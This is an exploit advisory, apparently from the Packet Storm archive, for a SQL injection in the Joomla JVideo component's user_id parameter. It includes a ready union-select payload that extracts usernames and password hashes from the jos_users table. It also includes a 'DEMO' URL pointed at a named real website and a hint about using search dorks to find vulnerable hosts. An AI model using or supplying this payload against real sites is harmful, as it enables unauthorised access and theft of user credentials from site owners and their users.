The Joomla JVideo component version 0.3.x suffers from a remote SQL injection vulnerability.
16a8427704f3a638e37455e70d6fe8a6++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jvideo (user_id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################
[+] Author : Chip D3 Bi0s
[+] Greetz : d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
--------------------------------------------------
author : Russell...
author Email : chipdebios[alt+64]gmail.com
###################################################
Example:
http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]
SQL code:
+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users
DEMO:
http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users
etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
<name>JVideo!</name>
<creationDate>September 2008</creationDate>
<author>Infinovision.com</author>
<authorEmail>team@infinovision.com</authorEmail>
<authorUrl>http://www.infinovision.com</authorUrl>
<copyright>Copyright 2008 Infinovision.com</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<version>0.3.11c Beta</version>
<description>JVideo! Component</description>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!